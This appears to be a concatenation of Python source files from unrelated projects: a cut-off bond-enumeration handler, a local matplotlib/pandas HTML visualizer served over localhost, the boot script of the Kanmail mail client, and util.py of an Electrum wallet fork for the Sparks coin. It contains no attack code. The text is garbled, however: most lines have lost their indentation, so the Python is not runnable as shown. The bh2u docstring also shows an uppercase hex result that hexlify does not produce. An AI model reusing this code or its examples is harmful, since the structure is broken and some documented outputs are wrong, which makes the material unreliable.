"""
Handles the response for the start of stored bond enumeration. Sets
self._num_bonds to the number of stored bonds.
args -- dictionary containing the number of stored bonds ('bonds'),
"""
self._num_bonds = args['bonds']
log.debug("num bonds = %d", args['bonds'])
|
local_visualizer.py
|
# -*- coding: utf-8 -*-
"""Simple api to visualize the plots in a script.
Motivation
==========
* When moving from an IPython notebook to a script, we lose the diagnostics
of visualizing pandas as tables and matplotlib plots.
* :class:`LocalViz` starts a local http server and creates a html file to
which pandas tables and matplotlib plots can be sent over.
* The html file is dynamically updated for long running scripts.
Usage
=====
Sample Usage::
import logging, sys, numpy as np, pandas as pd, matplotlib.pyplot as plt
import local_visualizer
plt.style.use('fivethirtyeight')
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
# Create the local visualizer instance
lviz = local_visualizer.LocalViz(html_file='lviz_test.html', port=9112)
# INFO:root:Starting background server at: http://localhost:9112/.
# INFO:local_visualizer:Click: http://carpediem:9112/lviz_test.html or http://localhost:9112/lviz_test.html # noqa
# Create plots which will be streamed to the html file.
lviz.h3('Matplotlib :o')
lviz.p(
'Wrap your plots in the figure context manager which takes '
'in the kwargs of plt.figure and returns a plt.figure object.',
)
with lviz.figure(figsize=(10, 8)) as fig:
x = np.linspace(-10, 10, 1000)
plt.plot(x, np.sin(x))
plt.title('Sine test')
lviz.hr()
# Visualize pandas dataframes as tables.
lviz.h3('Pandas dataframes')
df = pd.DataFrame({'A': np.linspace(1, 10, 10)})
df = pd.concat(
[df, pd.DataFrame(np.random.randn(10, 4), columns=list('BCDE'))],
axis=1,
)
lviz.write(df)
lviz.close()
Output
======
This starts a HTTPServer and creates a html file which is dynamically updated
each time ``lviz`` is called. See https://i.imgur.com/jjwvAX2.png for the
output of the above commands.
"""
import base64
try:
import BaseHTTPServer
import SimpleHTTPServer
except ModuleNotFoundError: # noqa (Python 3 only)
import http.server as SimpleHTTPServer
import http.server as BaseHTTPServer
import contextlib
import functools
import io
import logging
import os
import socket
import tempfile
import threading
import matplotlib.pyplot as plt
log = logging.getLogger(__name__)
#: The different HTML header levels.
HEADER_LEVELS = range(1, 6)
HTML_BEGIN_BOILERPLATE = """
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>Local Visualizer</title>
<style>
body {
-webkit-font-smoothing: antialiased;
-webkit-text-size-adjust: none;
margin: 50px !important;
font-size:20px;
font-family:Helvetica, sans-serif;
font-weight: 100;
}
table.dataframe {
border-collapse: collapse;
border: none;
}
table.dataframe tr {
border: none;
}
table.dataframe td, table.dataframe th {
margin: 2px;
border: 1px solid white;
padding-left: 0.25em;
padding-right: 0.25em;
}
table.dataframe th:not(:empty) {
background-color: #fec;
text-align: left;
font-weight: 100;
}
table.dataframe tr:nth-child(2) th:empty {
border-left: none;
border-right: 1px dashed #888;
}
table.dataframe td {
border: 2px solid #ccf;
background-color: #f4f4ff;
}
</style>
</head>
<body>
"""
HTML_END_BOILERPLATE = """
</body>
</html>
"""
def validate_lviz_started(method):
"""Decorater for LocalViz methods to ensure the instance has been started.
"""
@functools.wraps(method)
def validated_method(self, *args, **kwargs):
if not self.is_started:
raise RuntimeError(
'{f} was called before LocalViz was started. Please '
'start the visualizer with the `start` method.'.format(
f=method.__name__,
),
)
return method(self, *args, **kwargs)
return validated_method
class LocalViz(object):
"""API for creating a html visualizer for python scripts.
All the public methods of :class:`HtmlGenerator` are also exposed by
this class.
See module docstring for usage.
:ivar html_file: Path to the html file to write to. If the file
exists already it will be overwritten. If ``None`` is passed in,
the class will create a temp file.
:vartype html_file: str or NoneType
    :ivar run_server: Whether the server should be started in the background.
:vartype run_server: bool
:ivar port: The port at which the server is to be started.
:vartype port: int
:ivar _html_gen: A container for the html generation.
:vartype _html_gen: HtmlGenerator
    :ivar is_started: Whether :meth:`start` has been called.
:vartype is_started: bool
"""
def __init__(self, lazy=False, html_file=None, run_server=True, port=9111):
"""Constructor.
        :param lazy: Whether the server start and html file creation should
            be deferred (in which case :meth:`start` must be called explicitly).
:type lazy: bool
"""
self.html_file = html_file
self.port = port
self.run_server = run_server
self._html_gen = None
self.is_started = False
if not lazy:
self.start()
def start(self):
"""Creates the html file and possibly starts the bgd http server.
Mutates
* ``self.html_file``
* ``self._html_gen``
* ``self.is_started``
"""
if self.run_server:
run_bgd_server(
port=self.port,
host='localhost',
)
if self.html_file:
# Erase and create a new file.
open(self.html_file, 'w').close()
else:
_, self.html_file = tempfile.mkstemp(
dir=os.getcwd(),
suffix='.html',
)
self._html_gen = HtmlGenerator(output_fl=self.html_file)
        # Copy over the public functions of :class:`HtmlGenerator`.
for name in dir(self._html_gen):
if name.startswith('_'):
continue
member = getattr(self._html_gen, name)
if callable(member):
setattr(self, name, member)
log.info(
'Click: http://{hn}:{p}/{fl} or http://{h}:{p}/{fl}'.format(
hn=socket.gethostname(),
h='localhost',
p=self.port,
fl=self.html_file.split('/')[-1],
),
)
self.is_started = True
@validate_lviz_started
def inform_cleanup(self):
"""Informs the user which html file to delete at the end."""
if self.html_file:
log.info(
'After viewing the plots, please delete the '
'file: `{fl}`'.format(fl=self.html_file),
)
@validate_lviz_started
def close(self):
"""Writes the closing html tags to the html file."""
self._html_gen.write(HTML_END_BOILERPLATE)
@validate_lviz_started
def del_html(self):
"""Deletes the generated html file.
.. note:: Mutates ``self.html_file``.
"""
delete_files_silently([self.html_file])
self.html_file = None
class HtmlGenerator(object):
"""A class which updates a html file and exposes API for the same.
The class also exposes the methods ``h1``, ``h2``, ..., ``h6`` for writing
headers.
"""
def __init__(self, output_fl=None):
self.output_fl = output_fl
self.write(HTML_BEGIN_BOILERPLATE)
for lvl in HEADER_LEVELS:
setattr(
self,
'h{lvl}'.format(lvl=lvl),
functools.partial(self.header, level=lvl),
)
def header(self, text, level=4):
"""Creates a header line of given level.
:param text: The html header text.
:type text: str
:param level: The level of the html header.
:type level: int
"""
self.write('<h{lvl}>{text}</h{lvl}>'.format(text=text, lvl=level))
def p(self, text):
"""Writes a paragraph tagged text.
:param text: The html paragraph text.
:type text: str
"""
self.write('<p>{t}</p>'.format(t=text))
def br(self):
"""Inserts a break line in the html file."""
self.write('<br/>')
def hr(self):
"""Inserts a horizontal line wrapped in blank lines in the html file.
"""
self.write('<br/><hr/><br/>')
@contextlib.contextmanager
def figure(self, **figure_kwargs):
"""Context manager as a stand it replacement for ``plt.figure``.
Example usage::
with lviz.figure(figsize=(10, 10)) as fig:
plt.plot(x, y)
plt.title('This is a title')
"""
fig = plt.figure(**figure_kwargs)
fig_fl = io.BytesIO()
yield fig
plt.savefig(fig_fl, format='png')
fig_fl.seek(0)
fig_png = base64.b64encode(fig_fl.getvalue())
fig_png = fig_png.decode('ascii')
self.write(
'<img src="data:image/png;base64,{fig_png}" '
'width="500"><br/>'.format(fig_png=fig_png),
)
fig_fl.close()
def write(self, text_or_df):
"""Appends the text or a pandas df to the output file.
:param text_or_df: The string or the pandas dataframe to be written to
file.
:type text_or_df: str or pandas.DataFrame
"""
if isinstance(text_or_df, str):
text = text_or_df
else:
# Assume it is a pandas dataframe
text = text_or_df.to_html()
with open(self.output_fl, 'a+') as outfile:
outfile.write('{s}\n'.format(s=text))
def run_bgd_server(port, host='localhost'):
"""Creates a simple http server in a daemon thread.
:param host: The host id where the server has to be started,
ex. ``'localhost'``.
:type host: str
:param port: The port where the local server should serve.
:type port: int
:returns: A daemon thread running a simple http server in the background.
:type: threading.Thread
"""
logging.info(
'Starting background server at: '
'http://{h}:{p}/.'.format(h=host, p=port),
)
server = BaseHTTPServer.HTTPServer(
server_address=(host, port),
RequestHandlerClass=SimpleHTTPServer.SimpleHTTPRequestHandler,
)
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
return thread
def delete_files_silently(files):
"""Deletes a list of files if they exist.
:param files: A list of file paths.
:type files: list of str
"""
for each_file in files:
try:
os.remove(each_file)
except OSError:
pass
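if __name__ == '__main__':
    # Smoke test (illustrative): write one header and one plot, then close the
    # document; the background server keeps serving until the process exits.
    import numpy as np
    lviz = LocalViz(html_file='lviz_smoke_test.html', port=9111)
    lviz.h3('Smoke test')
    with lviz.figure(figsize=(6, 4)):
        x = np.linspace(0, 2 * np.pi, 200)
        plt.plot(x, np.cos(x))
    lviz.close()
    lviz.inform_cleanup()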
|
main.py
|
import sys
from threading import Thread
from time import sleep
import requests
import webview
from kanmail.license import validate_or_remove_license
from kanmail.log import logger
from kanmail.server.app import boot, server
from kanmail.server.mail.folder_cache import (
remove_stale_folders,
remove_stale_headers,
vacuum_folder_cache,
)
from kanmail.settings import get_window_settings
from kanmail.settings.constants import DEBUG, GUI_LIB, SERVER_HOST
from kanmail.version import get_version
from kanmail.window import create_window, destroy_main_window, init_window_hacks
def run_cache_cleanup_later():
sleep(120) # TODO: make this more intelligent?
remove_stale_folders()
remove_stale_headers()
vacuum_folder_cache()
def run_server():
logger.debug(f'Starting server on {SERVER_HOST}:{server.get_port()}')
try:
server.serve()
except Exception as e:
logger.exception(f'Exception in server thread!: {e}')
def monitor_threads(*threads):
while True:
for thread in threads:
if not thread.is_alive():
logger.critical(f'Thread: {thread} died, exiting!')
destroy_main_window()
else:
sleep(0.5)
def run_thread(target):
def wrapper(thread_name):
try:
target()
except Exception as e:
logger.exception(f'Unexpected exception in thread {thread_name}!: {e}')
thread = Thread(
target=wrapper,
args=(target.__name__,),
)
thread.daemon = True
thread.start()
def main():
logger.info(f'\n#\n# Booting Kanmail {get_version()}\n#')
init_window_hacks()
boot()
server_thread = Thread(name='Server', target=run_server)
server_thread.daemon = True
server_thread.start()
run_thread(validate_or_remove_license)
run_thread(run_cache_cleanup_later)
# Ensure the webserver is up & running by polling it
waits = 0
while waits < 10:
try:
response = requests.get(f'http://{SERVER_HOST}:{server.get_port()}/ping')
response.raise_for_status()
except requests.RequestException as e:
logger.warning(f'Waiting for main window: {e}')
sleep(0.1 * waits)
waits += 1
else:
break
else:
logger.critical('Webserver did not start properly!')
sys.exit(2)
create_window(
unique_key='main',
**get_window_settings(),
)
# Let's hope this thread doesn't fail!
monitor_thread = Thread(
name='Thread monitor',
target=monitor_threads,
args=(server_thread,),
)
monitor_thread.daemon = True
monitor_thread.start()
if DEBUG:
sleep(1) # give webpack a second to start listening
# Start the GUI - this will block until the main window is destroyed
webview.start(gui=GUI_LIB, debug=DEBUG)
# Main window closed, cleanup/exit
sys.exit()
if __name__ == '__main__':
main()
|
util.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import binascii
import os, sys, re, json
from collections import defaultdict
from typing import NamedTuple
from datetime import datetime
import decimal
from decimal import Decimal
import traceback
import urllib
import threading
import hmac
import stat
import inspect
from locale import localeconv
from .i18n import _
import urllib.request, urllib.parse, urllib.error
import queue
def inv_dict(d):
return {v: k for k, v in d.items()}
base_units = {'SPARKS':8, 'mSPARKS':5, 'uSPARKS':2, 'sprites':0}
base_units_inverse = inv_dict(base_units)
base_units_list = ['SPARKS', 'mSPARKS', 'uSPARKS', 'sprites'] # list(dict) does not guarantee order
def decimal_point_to_base_unit_name(dp: int) -> str:
# e.g. 8 -> "SPARKS"
try:
return base_units_inverse[dp]
except KeyError:
raise Exception('Unknown base unit')
def base_unit_name_to_decimal_point(unit_name: str) -> int:
# e.g. "SPARKS" -> 8
try:
return base_units[unit_name]
except KeyError:
raise Exception('Unknown base unit')
def normalize_version(v):
return [int(x) for x in re.sub(r'(\.0+)*$','', v).split(".")]
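# e.g. normalize_version('3.2.0') -> [3, 2], so trailing '.0' groups do not
# affect version comparisons: normalize_version('3.2') gives the same result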
# Raised when importing a key that's already in the wallet.
class AlreadyHaveAddress(Exception):
def __init__(self, msg, addr):
super(AlreadyHaveAddress, self).__init__(msg)
self.addr = addr
class NotEnoughFunds(Exception): pass
class NoDynamicFeeEstimates(Exception):
def __str__(self):
return _('Dynamic fee estimates not available')
class InvalidPassword(Exception):
def __str__(self):
return _("Incorrect password")
class FileImportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to import from file.") + "\n" + self.message
class FileExportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to export to file.") + "\n" + self.message
class TimeoutException(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
if not self.message:
return _("Operation timed out.")
return self.message
class WalletFileException(Exception): pass
class BitcoinException(Exception): pass
# Raise this exception to unwind the stack as when an error occurs;
# however, unlike other exceptions, the user will not be informed.
class UserCancelled(Exception):
'''An exception that is suppressed from the user'''
pass
class Satoshis(object):
__slots__ = ('value',)
def __new__(cls, value):
self = super(Satoshis, cls).__new__(cls)
self.value = value
return self
def __repr__(self):
        return 'Satoshis(%d)' % self.value
def __str__(self):
return format_satoshis(self.value) + " SPARKS"
class Fiat(object):
__slots__ = ('value', 'ccy')
def __new__(cls, value, ccy):
self = super(Fiat, cls).__new__(cls)
self.ccy = ccy
self.value = value
return self
def __repr__(self):
return 'Fiat(%s)'% self.__str__()
def __str__(self):
if self.value.is_nan():
return _('No Data')
else:
return "{:.2f}".format(self.value) + ' ' + self.ccy
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from .transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
if isinstance(obj, Satoshis):
return str(obj)
if isinstance(obj, Fiat):
return str(obj)
if isinstance(obj, Decimal):
return str(obj)
if isinstance(obj, datetime):
return obj.isoformat(' ')[:-3]
if isinstance(obj, set):
return list(obj)
return super(MyEncoder, self).default(obj)
class PrintError(object):
'''A handy base class'''
verbosity_filter = ''
def diagnostic_name(self):
return self.__class__.__name__
def print_error(self, *msg):
if self.verbosity_filter in verbosity or verbosity == '*':
print_error("[%s]" % self.diagnostic_name(), *msg)
def print_stderr(self, *msg):
print_stderr("[%s]" % self.diagnostic_name(), *msg)
def print_msg(self, *msg):
print_msg("[%s]" % self.diagnostic_name(), *msg)
class ThreadJob(PrintError):
"""A job that is run periodically from a thread's main loop. run() is
called from that thread's context.
"""
def run(self):
"""Called periodically from the thread"""
pass
class DebugMem(ThreadJob):
'''A handy class for debugging GC memory leaks'''
def __init__(self, classes, interval=30):
self.next_time = 0
self.classes = classes
self.interval = interval
def mem_stats(self):
import gc
self.print_error("Start memscan")
gc.collect()
objmap = defaultdict(list)
for obj in gc.get_objects():
for class_ in self.classes:
if isinstance(obj, class_):
objmap[class_].append(obj)
for class_, objs in objmap.items():
self.print_error("%s: %d" % (class_.__name__, len(objs)))
self.print_error("Finish memscan")
def run(self):
if time.time() > self.next_time:
self.mem_stats()
self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
""" daemon thread that terminates cleanly """
verbosity_filter = 'd'
def __init__(self):
threading.Thread.__init__(self)
        self.parent_thread = threading.current_thread()  # currentThread() is deprecated
self.running = False
self.running_lock = threading.Lock()
self.job_lock = threading.Lock()
self.jobs = []
def add_jobs(self, jobs):
with self.job_lock:
self.jobs.extend(jobs)
def run_jobs(self):
# Don't let a throwing job disrupt the thread, future runs of
# itself, or other jobs. This is useful protection against
# malformed or malicious server responses
with self.job_lock:
for job in self.jobs:
try:
job.run()
except Exception as e:
traceback.print_exc(file=sys.stderr)
def remove_jobs(self, jobs):
with self.job_lock:
for job in jobs:
self.jobs.remove(job)
def start(self):
with self.running_lock:
self.running = True
return threading.Thread.start(self)
def is_running(self):
with self.running_lock:
return self.running and self.parent_thread.is_alive()
def stop(self):
with self.running_lock:
self.running = False
def on_stop(self):
if 'ANDROID_DATA' in os.environ:
import jnius
jnius.detach()
self.print_error("jnius detach")
self.print_error("stopped")
verbosity = '*'
def set_verbosity(b):
global verbosity
verbosity = b
def print_error(*args):
if not verbosity: return
print_stderr(*args)
def print_stderr(*args):
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def json_encode(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
return s
def json_decode(x):
    try:
        return json.loads(x, parse_float=Decimal)
    except Exception:
        return x
# taken from Django Source Code
def constant_time_compare(val1, val2):
"""Return True if the two strings are equal, False otherwise."""
return hmac.compare_digest(to_bytes(val1, 'utf8'), to_bytes(val2, 'utf8'))
# decorator that prints execution time
def profiler(func):
def get_func_name(args):
arg_names_from_sig = inspect.getfullargspec(func).args
# prepend class name if there is one (and if we can find it)
if len(arg_names_from_sig) > 0 and len(args) > 0 \
and arg_names_from_sig[0] in ('self', 'cls', 'klass'):
classname = args[0].__class__.__name__
else:
classname = ''
name = '{}.{}'.format(classname, func.__name__) if classname else func.__name__
return name
def do_profile(args, kw_args):
name = get_func_name(args)
t0 = time.time()
o = func(*args, **kw_args)
t = time.time() - t0
print_error("[profiler]", name, "%.4f"%t)
return o
return lambda *args, **kw_args: do_profile(args, kw_args)
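# Usage sketch (load_transactions is a hypothetical method):
#
#   @profiler
#   def load_transactions(self):
#       ...
#
# would print something like "[profiler] Wallet.load_transactions 0.1234",
# with the class name prepended because the first argument is self.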
def android_ext_dir():
import jnius
env = jnius.autoclass('android.os.Environment')
return env.getExternalStorageDirectory().getPath()
def android_data_dir():
import jnius
PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_dir():
d = android_ext_dir() + '/org.sparks.electrum.electrum_sparks'
if not os.path.exists(d):
try:
os.mkdir(d)
except FileExistsError:
pass # in case of race
return d
def android_check_data_dir():
""" if needed, move old directory to sandbox """
ext_dir = android_ext_dir()
data_dir = android_data_dir()
old_electrum_dir = ext_dir + '/electrum-sparks'
if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
import shutil
new_headers_path = android_headers_dir() + '/blockchain_headers'
old_headers_path = old_electrum_dir + '/blockchain_headers'
if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
print_error("Moving headers file to", new_headers_path)
shutil.move(old_headers_path, new_headers_path)
print_error("Moving data to", data_dir)
shutil.move(old_electrum_dir, data_dir)
return data_dir
def get_headers_dir(config):
return android_headers_dir() if 'ANDROID_DATA' in os.environ else config.path
def assert_datadir_available(config_path):
path = config_path
if os.path.exists(path):
return
else:
raise FileNotFoundError(
'Sparks-Electrum datadir does not exist. Was it deleted while running?' + '\n' +
'Should be at {}'.format(path))
def assert_file_in_datadir_available(path, config_path):
if os.path.exists(path):
return
else:
assert_datadir_available(config_path)
raise FileNotFoundError(
'Cannot find file but datadir is there.' + '\n' +
'Should be at {}'.format(path))
def assert_bytes(*args):
"""
porting helper, assert args type
"""
try:
for x in args:
assert isinstance(x, (bytes, bytearray))
except:
print('assert bytes failed', list(map(type, args)))
raise
def assert_str(*args):
"""
porting helper, assert args type
"""
for x in args:
assert isinstance(x, str)
def to_string(x, enc):
if isinstance(x, (bytes, bytearray)):
return x.decode(enc)
if isinstance(x, str):
return x
else:
raise TypeError("Not a string or bytes like object")
def to_bytes(something, encoding='utf8'):
"""
cast string to bytes() like object, but for python2 support it's bytearray copy
"""
if isinstance(something, bytes):
return something
if isinstance(something, str):
return something.encode(encoding)
elif isinstance(something, bytearray):
return bytes(something)
else:
raise TypeError("Not a string or bytes like object")
bfh = bytes.fromhex
hfu = binascii.hexlify
def bh2u(x):
"""
str with hex representation of a bytes-like object
>>> x = bytes((1, 2, 10))
>>> bh2u(x)
'01020A'
:param x: bytes
:rtype: str
"""
return hfu(x).decode('ascii')
def user_dir():
if 'ANDROID_DATA' in os.environ:
return android_check_data_dir()
elif os.name == 'posix':
return os.path.join(os.environ["HOME"], ".electrum-sparks")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "Electrum-SPARKS")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "Electrum-SPARKS")
else:
#raise Exception("No home directory found in environment variables.")
return
def is_valid_email(s):
regexp = r"[^@]+@[^@]+\.[^@]+"
return re.match(regexp, s) is not None
def format_satoshis_plain(x, decimal_point = 8):
"""Display a satoshi amount scaled. Always uses a '.' as a decimal
point and has no thousands separator"""
scale_factor = pow(10, decimal_point)
return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.')
DECIMAL_POINT = localeconv()['decimal_point']
def format_satoshis(x, num_zeros=0, decimal_point=8, precision=None, is_diff=False, whitespaces=False):
if x is None:
return 'unknown'
if precision is None:
precision = decimal_point
decimal_format = ".0" + str(precision) if precision > 0 else ""
if is_diff:
decimal_format = '+' + decimal_format
result = ("{:" + decimal_format + "f}").format(x / pow (10, decimal_point)).rstrip('0')
integer_part, fract_part = result.split(".")
dp = DECIMAL_POINT
if len(fract_part) < num_zeros:
fract_part += "0" * (num_zeros - len(fract_part))
result = integer_part + dp + fract_part
if whitespaces:
result += " " * (decimal_point - len(fract_part))
result = " " * (15 - len(result)) + result
return result
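# e.g. format_satoshis(1234500000) -> '12.345' and, with is_diff=True,
# format_satoshis(1234500000, is_diff=True) -> '+12.345'
# (assuming a locale whose decimal point is '.')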
FEERATE_PRECISION = 0 # num fractional decimal places for sprites/kB fee rates
_feerate_quanta = Decimal(10) ** (-FEERATE_PRECISION)
def format_fee_satoshis(fee, num_zeros=0):
return '%d' % round(fee)
def quantize_feerate(fee):
"""Strip sat/byte fee rate of excess precision."""
if fee is None:
return None
return Decimal(fee).quantize(_feerate_quanta, rounding=decimal.ROUND_HALF_DOWN)
def timestamp_to_datetime(timestamp):
if timestamp is None:
return None
return datetime.fromtimestamp(timestamp)
def format_time(timestamp):
date = timestamp_to_datetime(timestamp)
return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
td = time_difference(from_date - since_date, include_seconds)
return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
#distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
    elif distance_in_minutes < 43200:  # 30 days
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
return "over %d years" % (round(distance_in_minutes / 525600))
mainnet_block_explorers = {
'insight.sparkspay.io': ('http://insight.sparkspay.io/insight/',
{'tx': 'tx/', 'addr': 'address/'}),
'sparkspay.io': ('http://explorer.sparkspay.io/',
{'tx': 'tx/', 'addr': 'addr/'}),
}
testnet_block_explorers = {
'sparkspay.io': ('https://test.insight.sparks.siampm.com/',
{'tx': 'tx/', 'addr': 'address/'}),
'system default': ('blockchain:/',
{'tx': 'tx/', 'addr': 'address/'}),
}
def block_explorer_info():
from . import constants
return testnet_block_explorers if constants.net.TESTNET else mainnet_block_explorers
def block_explorer(config):
return config.get('block_explorer', 'sparkspay.io')
def block_explorer_tuple(config):
return block_explorer_info().get(block_explorer(config))
def block_explorer_URL(config, kind, item):
be_tuple = block_explorer_tuple(config)
if not be_tuple:
return
kind_str = be_tuple[1].get(kind)
if not kind_str:
return
url_parts = [be_tuple[0], kind_str, item]
return ''.join(url_parts)
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
from . import bitcoin
from .bitcoin import COIN
if ':' not in uri:
if not bitcoin.is_address(uri):
raise Exception("Not a Sparks address")
return {'address': uri}
u = urllib.parse.urlparse(uri)
if u.scheme != 'sparks':
raise Exception("Not a Sparks URI")
address = u.path
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query)
else:
pq = urllib.parse.parse_qs(u.query)
for k, v in pq.items():
if len(v)!=1:
raise Exception('Duplicate Key', k)
out = {k: v[0] for k, v in pq.items()}
if address:
if not bitcoin.is_address(address):
raise Exception("Invalid Sparks address:" + address)
out['address'] = address
if 'amount' in out:
am = out['amount']
        m = re.match(r'([0-9.]+)X([0-9])', am)
if m:
k = int(m.group(2)) - 8
amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
else:
amount = Decimal(am) * COIN
out['amount'] = int(amount)
    if 'message' in out:
        out['memo'] = out['message']
if 'time' in out:
out['time'] = int(out['time'])
if 'exp' in out:
out['exp'] = int(out['exp'])
if 'sig' in out:
out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if on_pr and (r or (name and sig)):
def get_payment_request_thread():
from . import paymentrequest as pr
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
if on_pr:
on_pr(request)
t = threading.Thread(target=get_payment_request_thread)
        t.daemon = True
t.start()
return out
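# Usage sketch (hypothetical address, accepted by bitcoin.is_address):
#
#   parse_URI('sparks:XsomeValidAddress?amount=1.5&message=donation')
#   -> {'address': 'XsomeValidAddress', 'amount': 150000000,
#       'message': 'donation', 'memo': 'donation'}
#
# The amount is converted into the base unit (1 SPARKS = 10**8 sprites).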
def create_URI(addr, amount, message):
from . import bitcoin
if not bitcoin.is_address(addr):
return ""
query = []
if amount:
query.append('amount=%s'%format_satoshis_plain(amount))
if message:
query.append('message=%s'%urllib.parse.quote(message))
p = urllib.parse.ParseResult(scheme='sparks', netloc='', path=addr, params='', query='&'.join(query), fragment='')
return urllib.parse.urlunparse(p)
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
#TODO: py3
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
import builtins
builtin_raw_input = builtins.input
builtins.input = raw_input
def parse_json(message):
# TODO: check \r\n pattern
n = message.find(b'\n')
if n==-1:
return None, message
try:
j = json.loads(message[0:n].decode('utf8'))
    except Exception:
j = None
return j, message[n+1:]
def utfify(arg):
"""Convert unicode argument to UTF-8.
Used when loading things that must be serialized.
"""
if isinstance(arg, dict):
return {utfify(k): utfify(v) for k, v in arg.items()}
elif isinstance(arg, list):
        return [utfify(v) for v in arg]  # a list, not a lazy map, so it can be serialized
elif isinstance(arg, str):
return arg.encode('utf-8')
return arg
class timeout(Exception):
pass
import socket
import json
import ssl
import time
class SocketPipe:
def __init__(self, socket):
self.socket = socket
self.message = b''
self.set_timeout(0.1)
self.recv_time = time.time()
def set_timeout(self, t):
self.socket.settimeout(t)
def idle_time(self):
return time.time() - self.recv_time
def get(self):
while True:
response, self.message = parse_json(self.message)
if response is not None:
return response
try:
data = self.socket.recv(1024)
except socket.timeout:
raise timeout
except ssl.SSLError:
raise timeout
except socket.error as err:
if err.errno == 60:
raise timeout
elif err.errno in [11, 35, 10035]:
print_error("socket errno %d (resource temporarily unavailable)"% err.errno)
time.sleep(0.2)
raise timeout
else:
print_error("pipe: socket error", err)
data = b''
            except Exception:
traceback.print_exc(file=sys.stderr)
data = b''
if not data: # Connection closed remotely
return None
self.message += data
self.recv_time = time.time()
def send(self, request):
out = json.dumps(request) + '\n'
out = out.encode('utf8')
self._send(out)
def send_all(self, requests):
out = b''.join(map(lambda x: (json.dumps(x) + '\n').encode('utf8'), requests))
self._send(out)
def _send(self, out):
while out:
try:
sent = self.socket.send(out)
out = out[sent:]
except ssl.SSLError as e:
print_error("SSLError:", e)
time.sleep(0.1)
continue
class QueuePipe:
def __init__(self, send_queue=None, get_queue=None):
self.send_queue = send_queue if send_queue else queue.Queue()
self.get_queue = get_queue if get_queue else queue.Queue()
self.set_timeout(0.1)
def get(self):
try:
return self.get_queue.get(timeout=self.timeout)
except queue.Empty:
raise timeout
def get_all(self):
responses = []
while True:
try:
r = self.get_queue.get_nowait()
responses.append(r)
except queue.Empty:
break
return responses
def set_timeout(self, t):
self.timeout = t
def send(self, request):
self.send_queue.put(request)
def send_all(self, requests):
for request in requests:
self.send(request)
